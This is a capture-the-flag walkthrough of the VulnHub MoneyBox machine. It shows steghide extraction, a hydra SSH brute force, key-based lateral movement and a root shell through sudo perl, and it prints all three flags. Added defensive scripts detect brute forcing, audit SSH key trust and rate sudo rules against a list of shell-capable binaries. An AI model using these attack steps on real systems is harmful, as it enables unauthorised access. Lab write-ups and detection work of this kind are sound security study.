Initial Enumeration and User Shell

As usual, I started with an nmap scan looking for open ports and running services.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ nmap -sC -sV -oA nmap/initial 192.168.1.2
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 23:04 IST
Nmap scan report for 192.168.1.2 
Host is up (0.00085s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26 08:48 trytofind.jpg
| ftp-syst:            
|   STAT:         
| FTP server status:             
|      Connected to ::ffff:192.168.1.3  
|      Logged in as ftp                
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text                         
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable                    
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
|   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MoneyBox
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.59 seconds

We have an FTP server running on port 21, SSH on port 22 and an Apache web server on port 80. Port 21 allows anonymous login, so I started enumerating it first. Enter the username anonymous, leave the password field empty and press enter.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ ftp 192.168.1.2
Connected to 192.168.1.2.
220 (vsFTPd 3.0.3)
Name (192.168.1.2:madhav): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0         1093656 Feb 26 08:48 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
226 Transfer complete.
1093656 bytes received in 0.10 secs (10.5665 MB/s)
ftp> exit
221 Goodbye.

We have an image named trytofind.jpg, which looks like this:

We can see some white marks on the image, which suggests that it has data hidden inside it with a steganography tool. We can use steghide to extract the hidden data.

I tried extracting the data with steghide using an empty passphrase, but that did not work. This means we need to find the passphrase before we can extract anything from the image.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ steghide --extract -sf trytofind.jpg 
Enter passphrase: 
steghide: could not extract any data with that passphrase!

Next, I started enumerating port 80 to see if we can find a password there:

There is nothing interesting on the home page, and I checked its source code without finding anything useful. Next I ran a gobuster scan to look for hidden files or directories and found a directory named /blogs.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ gobuster dir -u http://192.168.1.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.zip,.jpg,.js,.css
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.2
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     zip,jpg,js,css,php,html,txt
[+] Timeout:        10s
===============================================================
2021/03/05 23:12:07 Starting gobuster
===============================================================
/index.html (Status: 200)
/blogs (Status: 301)
/server-status (Status: 403)
===============================================================
2021/03/05 23:27:18 Finished
===============================================================

After visiting the /blogs directory I again checked the source code, scrolled down, and this time found a secret message.

I visited the /S3cr3t-T3xt directory and in its source code, I found another comment which contained the password we wanted.

I used this passphrase to extract the data from trytofind.jpg with steghide, and this time it produced a data.txt.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]                               
└─$ steghide --extract -sf trytofind.jpg1 
Enter passphrase:
wrote extracted data to "data.txt".

After reading the contents of data.txt, I found a username, renu, and the hint that renu is using a weak password, so the next step is to brute-force the SSH login.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ cat data.txt 
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......

Next, I used hydra to brute force the login password and found the password 987654321.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.1.2 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-05 23:30:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.2:22/
[22][ssh] host: 192.168.1.2   login: renu   password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-05 23:30:26
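The hydra run above is the attacker's view of the event. On the server, the same twenty seconds show up in /var/log/auth.log as a burst of "Failed password" lines from one source address followed by an "Accepted password" from that same address. The following Python script is an added example, not part of the original walkthrough: it parses sshd log lines in Debian's syslog format, counts password failures per source address inside a sliding window, and raises an alert both when the burst crosses a threshold and when a password login from a flagged address then succeeds. The log lines, addresses, PIDs and timestamps are constructed for the example.

```python
"""SSH password-guessing detector over sshd auth.log lines.

Added example, not part of the original walkthrough. The sample log lines
below are constructed to resemble what the hydra run above would leave in
/var/log/auth.log on a Debian host; the addresses and timestamps are made up.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: traditional syslog format, no year in the timestamp.
SAMPLE_LOG = """\
Mar  5 23:30:05 MoneyBox sshd[1201]: Failed password for renu from 192.168.1.3 port 51002 ssh2
Mar  5 23:30:05 MoneyBox sshd[1202]: Failed password for renu from 192.168.1.3 port 51004 ssh2
Mar  5 23:30:06 MoneyBox sshd[1203]: Failed password for invalid user admin from 192.168.1.3 port 51006 ssh2
Mar  5 23:30:07 MoneyBox sshd[1204]: Failed password for renu from 192.168.1.3 port 51008 ssh2
Mar  5 23:30:08 MoneyBox sshd[1205]: Failed password for renu from 192.168.1.3 port 51010 ssh2
Mar  5 23:30:09 MoneyBox sshd[1206]: Failed password for renu from 192.168.1.3 port 51012 ssh2
Mar  5 23:30:26 MoneyBox sshd[1250]: Accepted password for renu from 192.168.1.3 port 51100 ssh2
Mar  5 23:40:00 MoneyBox sshd[1300]: Accepted publickey for lily from 192.168.1.2 port 40000 ssh2: RSA SHA256:constructed
Mar  5 23:41:00 MoneyBox sshd[1301]: Failed password for renu from 10.0.0.9 port 2222 ssh2
"""

# Matches "Failed password for renu from ...", the "invalid user" variant,
# and the Accepted forms (password and publickey).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line, year=2021):
    """Return a dict for an sshd auth line, or None for anything else.
    Syslog timestamps carry no year, so the caller supplies one."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect(log_text, threshold=5, window_seconds=60):
    """Walk the log once and return alerts in order of occurrence.

    ("bruteforce", ip, n)  - n failed password logins from ip inside the window
    ("guessed", ip, user)  - a password login from a flagged ip then succeeded,
                             i.e. the guessing most likely worked
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures still in window
    flagged = set()               # ips already reported as brute-forcing
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        window = recent[ev["ip"]]
        while window and (ev["ts"] - window[0]).total_seconds() > window_seconds:
            window.popleft()      # expire failures older than the window
        if ev["result"] == "Failed" and ev["method"] == "password":
            window.append(ev["ts"])
            if len(window) >= threshold and ev["ip"] not in flagged:
                flagged.add(ev["ip"])
                alerts.append(("bruteforce", ev["ip"], len(window)))
        elif (ev["result"] == "Accepted" and ev["method"] == "password"
              and ev["ip"] in flagged):
            alerts.append(("guessed", ev["ip"], ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The "guessed" alert is the one worth paging on: a threshold of failed logins on its own is noisy, but a password success from an address that was just guessing is almost always an account takeover. Rate limiting at the sshd level (MaxAuthTries, or a fail2ban-style block) and disabling password authentication for the account are the matching mitigations.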

We can now log in via SSH using the username renu and the password 987654321.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ ssh renu@192.168.1.2
The authenticity of host '192.168.1.2 (192.168.1.2)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.2' (ECDSA) to the list of known hosts.
renu@192.168.1.2's password:
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
renu@MoneyBox:~$ ls
ftp  user1.txt
renu@MoneyBox:~$ cat user1.txt
Yes...!
You Got it User1 Flag

 ==> us3r1{F14g:0ku74tbd3777y4}

renu@MoneyBox:~$

Privilege Escalation

Next, I checked for other users on the box and found a user lily. I checked the .ssh directory of user lily and found that renu's public key was listed in lily's authorized_keys file.

renu@MoneyBox:/home/lily/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIi
VrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlv
IVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 [email protected]

This means that user renu can log in directly as user lily via SSH without a password. So I switched to user lily using the following command and got our second flag:

renu@MoneyBox:/home/lily/.ssh$ ssh lily@192.168.1.2
The authenticity of host '192.168.1.2 (192.168.1.2)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.2' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$ ls
user2.txt
lily@MoneyBox:~$ cat user2.txt
Yeah.....
You Got a User2 Flag

==> us3r{F14g:tr5827r5wu6nklao}

lily@MoneyBox:~$
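The lateral move from renu to lily is a misconfiguration an administrator can find before an attacker does: one user's public key sitting in another user's authorized_keys. The script below is an added example, not part of the original walkthrough. It fingerprints every user's own public keys (~/.ssh/*.pub) and every entry in every user's authorized_keys the way ssh-keygen does (SHA256 over the decoded key blob), then reports entries owned by a different local user, or by no known user at all, and follows the resulting trust chains. The home-directory contents and key blobs are constructed for the example (base64 of a short string, not real key material).

```python
"""Audit cross-user SSH key trust between local accounts.

Added example, not part of the original walkthrough. It models the finding
above (renu's public key in lily's authorized_keys) as a small audit over a
constructed picture of /home/<user>/.ssh. The key blobs are fake (base64 of a
short string); the fingerprint scheme is OpenSSH's SHA256 over the decoded blob.
"""
import base64
import hashlib

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def fingerprint(key_line):
    """SHA256:<unpadded base64> of the key blob, as `ssh-keygen -lf` prints it.
    Skips an optional leading options field (e.g. no-pty) and ignores the
    comment; options containing quoted spaces are out of scope here."""
    fields = key_line.split()
    for i, field in enumerate(fields):
        if field.startswith(KEY_TYPE_PREFIXES):
            blob = fields[i + 1]
            break
    else:
        raise ValueError(f"no key type field in: {key_line!r}")
    digest = hashlib.sha256(base64.b64decode(blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def constructed_key(label):
    """Fake but well-formed key line for the sample data (NOT a real key)."""
    blob = base64.b64encode(f"constructed-key-{label}".encode()).decode()
    return f"ssh-rsa {blob} {label}"


# Constructed model of /home/<user>/.ssh: the user's own public keys, and the
# authorized_keys entries that grant access *to* that user.
HOMES = {
    "renu": {"pub": [constructed_key("renu@MoneyBox")],
             "authorized": []},
    "lily": {"pub": [constructed_key("lily@MoneyBox")],
             "authorized": [constructed_key("renu@MoneyBox"),
                            constructed_key("unknown-laptop")]},
}


def cross_user_keys(homes):
    """Return (key_owner, target_user) pairs where key_owner's key appears in
    target_user's authorized_keys. Owner is '<unknown>' when the key matches
    none of the local users' .pub files, which also deserves review."""
    owner_of = {}
    for user, files in homes.items():
        for line in files["pub"]:
            owner_of[fingerprint(line)] = user
    findings = []
    for target, files in homes.items():
        for line in files["authorized"]:
            owner = owner_of.get(fingerprint(line), "<unknown>")
            if owner != target:        # a user's own key in their own file is fine
                findings.append((owner, target))
    return findings


def reachable(homes, start):
    """Accounts that whoever holds `start`'s private keys can reach by
    chaining key trust, without any password."""
    edges = cross_user_keys(homes)
    seen, stack = set(), [start]
    while stack:
        current = stack.pop()
        for owner, target in edges:
            if owner == current and target not in seen:
                seen.add(target)
                stack.append(target)
    return seen


if __name__ == "__main__":
    for owner, target in cross_user_keys(HOMES):
        print(f"{owner} can log in as {target}")
    print("reachable from renu:", sorted(reachable(HOMES, "renu")))
```

On a real host the two lists per user come from reading /home/*/.ssh/*.pub and /home/*/.ssh/authorized_keys, and `ssh-keygen -lf authorized_keys` prints the same fingerprints if you want to cross-check by hand. Matching on fingerprints rather than on the key comment matters: the comment is free text that anyone who can write the file can set to whatever they like.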

Root Shell

Gaining a root shell was quite easy. I ran the sudo -l command and found that user lily can run /usr/bin/perl as root.

lily@MoneyBox:/home$ sudo -l
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl

I checked on GTFOBins and found that we can spawn a root shell by using the following command:

lily@MoneyBox:/home$ sudo perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@MoneyBox:/home#
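A NOPASSWD rule for an interpreter is equivalent to handing out root, which is exactly what the perl rule above turned into. The script below is an added example, not part of the original walkthrough: it parses the "may run the following commands" block of `sudo -l` output and rates each command against a short list of binaries that give a shell or an arbitrary file write when run as root. The sample output is constructed: the perl rule mirrors the box, and the second line is a made-up contrast case; the list of binaries is illustrative, not exhaustive.

```python
"""Rate `sudo -l` rules for privilege-escalation risk.

Added example, not part of the original walkthrough. The rule found above,
(ALL : ALL) NOPASSWD: /usr/bin/perl, is equivalent to root because perl can
exec a shell. This parses the "may run the following commands" block of
`sudo -l` output and labels each command. The sample below is constructed.
"""
import re

# Not exhaustive (GTFOBins lists many more): binaries that give a shell or an
# arbitrary file write outright when run as root.
SHELL_CAPABLE = {
    "bash", "sh", "dash", "zsh", "perl", "python", "python3", "ruby", "php",
    "vim", "vi", "nano", "less", "more", "find", "awk", "env", "tee",
}

# "(runas) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

SAMPLE_SUDO_L = """\
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2, /usr/bin/apt-get update
"""


def parse_sudo_l(text):
    """Return one dict per command: runas spec, NOPASSWD flag, command string."""
    rules, in_block = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_block = True
            continue
        if not in_block or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            rules.append({"runas": m["runas"].strip(),
                          "nopasswd": "NOPASSWD" in tags,
                          "command": cmd.strip()})
    return rules


def assess(rule):
    """Short risk label for one rule."""
    if rule["command"] == "ALL":
        return "critical: unrestricted"
    name = rule["command"].split()[0].rsplit("/", 1)[-1]
    if name in SHELL_CAPABLE or name.startswith(("python", "perl", "ruby")):
        risk = "critical: shell-capable binary"
    else:
        risk = "review"   # not in the list above; still check GTFOBins by hand
    return f"{risk} (NOPASSWD)" if rule["nopasswd"] else risk


def audit(text):
    """(command, risk label) for every rule in the `sudo -l` output."""
    return [(rule["command"], assess(rule)) for rule in parse_sudo_l(text)]


if __name__ == "__main__":
    for command, risk in audit(SAMPLE_SUDO_L):
        print(f"{risk:45} {command}")
```

The fix for a rule like the perl one is not a password prompt but removing the rule: if a user genuinely needs one perl script to run as root, grant that script with its full path and fixed arguments, not the interpreter.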

Hurray! We are root, and now we can read our final flag in root's home directory.

root@MoneyBox:~# cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
    ==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
    It's My First CTF Box
         
instagram : ____kirthik____

See You Back....

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Alexey Kuvaldin.